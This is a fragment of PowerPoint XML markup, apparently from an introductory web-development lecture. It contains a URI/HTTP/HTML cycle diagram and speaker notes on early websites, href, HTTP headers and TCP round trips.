    <dgm:pt modelId="{44E81398-CBD3-AD4D-A9D3-D78E2B03BEA4}" type="pres">
      <dgm:prSet presAssocID="{029BC380-AE06-F049-B233-B94CED337229}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2BCD63F8-0992-8047-BD3E-C7C6642751FB}" type="pres">
      <dgm:prSet presAssocID="{029BC380-AE06-F049-B233-B94CED337229}" presName="node" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16E50070-4A9A-5348-945D-89CB77A8A698}" type="pres">
      <dgm:prSet presAssocID="{80B5D6D9-62AF-0949-9392-2C34C03328C1}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F8B848D-972E-7742-87F6-4B9CE37481E2}" type="pres">
      <dgm:prSet presAssocID="{E450D9EF-EEA6-484F-91DB-8522B2C67B33}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5DDF275-9A12-774D-AD8C-46F35B80F039}" type="pres">
      <dgm:prSet presAssocID="{E450D9EF-EEA6-484F-91DB-8522B2C67B33}" presName="node" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B08FB0BE-5513-A344-B90C-C8BD039DA865}" type="pres">
      <dgm:prSet presAssocID="{8CB78055-E48B-1D41-98A6-30E9DB4465D0}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{513D2D8C-3006-F147-A26E-43702AFA7FBE}" type="pres">
      <dgm:prSet presAssocID="{5B4F23FE-183F-DA49-BFAE-9F932E85AA24}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{35CD89E4-D646-6D47-8747-B9B2278DC4C3}" type="pres">
      <dgm:prSet presAssocID="{5B4F23FE-183F-DA49-BFAE-9F932E85AA24}" presName="node" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{651471D9-BD4E-3947-BBA4-8A9580BC6FD1}" type="pres">
      <dgm:prSet presAssocID="{5C0208DA-98BF-074A-B0E1-279F979845C0}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{375F6E05-ADE7-8A41-AB55-E9751DFA63ED}" srcId="{5D6C2473-1A97-4A4C-BDD6-7B4448E5C484}" destId="{5B4F23FE-183F-DA49-BFAE-9F932E85AA24}" srcOrd="2" destOrd="0" parTransId="{B341A215-37DA-2945-BAB1-8575F7ED15F8}" sibTransId="{5C0208DA-98BF-074A-B0E1-279F979845C0}"/>
    <dgm:cxn modelId="{F6415B0F-6AB1-C74A-92B7-5A25A83A3F02}" type="presOf" srcId="{5B4F23FE-183F-DA49-BFAE-9F932E85AA24}" destId="{35CD89E4-D646-6D47-8747-B9B2278DC4C3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{ECE2702E-45B9-9C43-B106-ADD74C74D18B}" type="presOf" srcId="{80B5D6D9-62AF-0949-9392-2C34C03328C1}" destId="{16E50070-4A9A-5348-945D-89CB77A8A698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{F02C733A-21DC-2347-9F74-9D96CE142687}" type="presOf" srcId="{E450D9EF-EEA6-484F-91DB-8522B2C67B33}" destId="{C5DDF275-9A12-774D-AD8C-46F35B80F039}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{C4BE233F-9AB7-C54D-988A-003156B686A7}" type="presOf" srcId="{5D6C2473-1A97-4A4C-BDD6-7B4448E5C484}" destId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{FEA3977B-7A4E-4F48-985D-59EE16EB43BD}" srcId="{5D6C2473-1A97-4A4C-BDD6-7B4448E5C484}" destId="{029BC380-AE06-F049-B233-B94CED337229}" srcOrd="0" destOrd="0" parTransId="{D2E85C33-17F9-6041-8124-4527FFC4F127}" sibTransId="{80B5D6D9-62AF-0949-9392-2C34C03328C1}"/>
    <dgm:cxn modelId="{5CD1347E-FBC1-AC49-A3D7-8251F221C4EB}" srcId="{5D6C2473-1A97-4A4C-BDD6-7B4448E5C484}" destId="{E450D9EF-EEA6-484F-91DB-8522B2C67B33}" srcOrd="1" destOrd="0" parTransId="{2BF3A702-2F6B-C247-9A43-4C0E58139F72}" sibTransId="{8CB78055-E48B-1D41-98A6-30E9DB4465D0}"/>
    <dgm:cxn modelId="{58F433A2-49FD-6B4F-AFC1-3C3E4AC3EFA3}" type="presOf" srcId="{029BC380-AE06-F049-B233-B94CED337229}" destId="{2BCD63F8-0992-8047-BD3E-C7C6642751FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{9B6289B2-BA70-964C-898F-39F23F509680}" type="presOf" srcId="{5C0208DA-98BF-074A-B0E1-279F979845C0}" destId="{651471D9-BD4E-3947-BBA4-8A9580BC6FD1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{F1778ACD-D80C-5F44-9CD1-3794C8AAD63E}" type="presOf" srcId="{8CB78055-E48B-1D41-98A6-30E9DB4465D0}" destId="{B08FB0BE-5513-A344-B90C-C8BD039DA865}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{6C78F161-32FB-1F40-9C2D-059941985FC6}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{44E81398-CBD3-AD4D-A9D3-D78E2B03BEA4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{A9362F6C-7B39-0B48-A749-FBFAA85D7401}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{2BCD63F8-0992-8047-BD3E-C7C6642751FB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{BAC4932A-2EFA-A041-A755-816B5554DC94}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{16E50070-4A9A-5348-945D-89CB77A8A698}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{18A48FA1-7D46-2346-9F43-1D712963A842}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{4F8B848D-972E-7742-87F6-4B9CE37481E2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{D4D5003A-F6B5-7A4C-AFDD-B3156D52AF12}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{C5DDF275-9A12-774D-AD8C-46F35B80F039}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{5992881C-C443-FE4F-878C-DD1C83EF8C16}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{B08FB0BE-5513-A344-B90C-C8BD039DA865}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{63BF808B-FC8C-9B4F-AB88-A003F6D2B728}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{513D2D8C-3006-F147-A26E-43702AFA7FBE}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{4D38BA28-90ED-9B48-83E8-53399D434351}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{35CD89E4-D646-6D47-8747-B9B2278DC4C3}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{744DCFEA-937F-1049-BECB-94665BDFF342}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{651471D9-BD4E-3947-BBA4-8A9580BC6FD1}"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D63F8-0992-8047-BD3E-C7C6642751FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4857412"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URI</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4857412" y="426901"/>
        <a:ext cx="2169914" cy="2169914"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{16E50070-4A9A-5348-945D-89CB77A8A698}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1546110" y="-1683"/>
          <a:ext cx="5137379" cy="5137379"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 8236"/>
            <a:gd name="adj2" fmla="val 575086"/>
            <a:gd name="adj3" fmla="val 2968572"/>
            <a:gd name="adj4" fmla="val 4856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DDF275-9A12-774D-AD8C-46F35B80F039}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3029842" y="3592344"/>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HTTP</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3029842" y="3592344"/>
        <a:ext cx="2169914" cy="2169914"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B08FB0BE-5513-A344-B90C-C8BD039DA865}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1546110" y="-1683"/>
          <a:ext cx="5137379" cy="5137379"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 8236"/>
            <a:gd name="adj2" fmla="val 575086"/>
            <a:gd name="adj3" fmla="val 10176351"/>
            <a:gd name="adj4" fmla="val 725634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CD89E4-D646-6D47-8747-B9B2278DC4C3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1202273"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HTML</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1202273" y="426901"/>
        <a:ext cx="2169914" cy="2169914"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{651471D9-BD4E-3947-BBA4-8A9580BC6FD1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1546110" y="-1683"/>
          <a:ext cx="5137379" cy="5137379"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 8236"/>
            <a:gd name="adj2" fmla="val 575086"/>
            <a:gd name="adj3" fmla="val 16861127"/>
            <a:gd name="adj4" fmla="val 14963787"/>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D63F8-0992-8047-BD3E-C7C6642751FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4857412"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URI</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4857412" y="426901"/>
        <a:ext cx="2169914" cy="2169914"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{16E50070-4A9A-5348-945D-89CB77A8A698}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1546110" y="-1683"/>
          <a:ext cx="5137379" cy="5137379"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 8236"/>
            <a:gd name="adj2" fmla="val 575086"/>
            <a:gd name="adj3" fmla="val 2968572"/>
            <a:gd name="adj4" fmla="val 4856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5DDF275-9A12-774D-AD8C-46F35B80F039}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3029842" y="3592344"/>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HTTP</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3029842" y="3592344"/>
        <a:ext cx="2169914" cy="2169914"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B08FB0BE-5513-A344-B90C-C8BD039DA865}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1546110" y="-1683"/>
          <a:ext cx="5137379" cy="5137379"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 8236"/>
            <a:gd name="adj2" fmla="val 575086"/>
            <a:gd name="adj3" fmla="val 10176351"/>
            <a:gd name="adj4" fmla="val 7256342"/>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5CD89E4-D646-6D47-8747-B9B2278DC4C3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1202273" y="426901"/>
          <a:ext cx="2169914" cy="2169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60" tIns="73660" rIns="73660" bIns="73660" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="2578100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="5800" kern="1200" dirty="0"/>
            <a:t>HTML</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1202273" y="426901"/>
        <a:ext cx="2169914" cy="2169914"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{651471D9-BD4E-3947-BBA4-8A9580BC6FD1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1546110" y="-1683"/>
          <a:ext cx="5137379" cy="5137379"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 8236"/>
            <a:gd name="adj2" fmla="val 575086"/>
            <a:gd name="adj3" fmla="val 16861127"/>
            <a:gd name="adj4" fmla="val 14963787"/>
            <a:gd name="adj5" fmla="val 960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image" Target="../media/image7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2F0151-EC07-934A-AE26-1DBB68DC41B8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/26/18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47CE2-62FE-FC4C-963B-9645AF7FF934}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="925978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8267C-E060-7343-A0FE-934AF6E9F7DE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/26/18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2F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4059887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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="952597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Chrome to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>www.google.com</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162833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we ended the first day.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110904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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4582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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224705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putting the hypertext in HTML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> stand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> for?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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2995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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308456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do we need the Content-Length header?</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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25247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last option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is the most common, it's important to get an understanding of where we came from. Plus, there might be applications that use the other two features.</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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="802424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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> 17</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, 1996</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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1594631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Amazon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at launch, 1995</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127924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web browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334899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Altavista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> October 1996</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86080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these are just HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> requests and responses. There are also TCP connection establishment (which requires two round trips).</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136</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="587167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144</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1137548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7E7EE-EE9D-B14B-9D35-3EB9FCDEF16B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>225</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1101826" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110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82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DE3E0-C955-784C-B82B-B66490F7B03F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>226</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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753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7815-A9CF-0B41-B174-DC804CED91CE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>227</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7815-A9CF-0B41-B174-DC804CED91CE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>228</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8888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7F156-632F-A849-B440-8E41B57E85F9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>229</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3542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1A2A1D-13E7-BA4A-9B91-541DB6ED33EC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>230</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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4402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2C0E0-1750-624A-A359-51067DC8F5CF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>232</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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490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website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
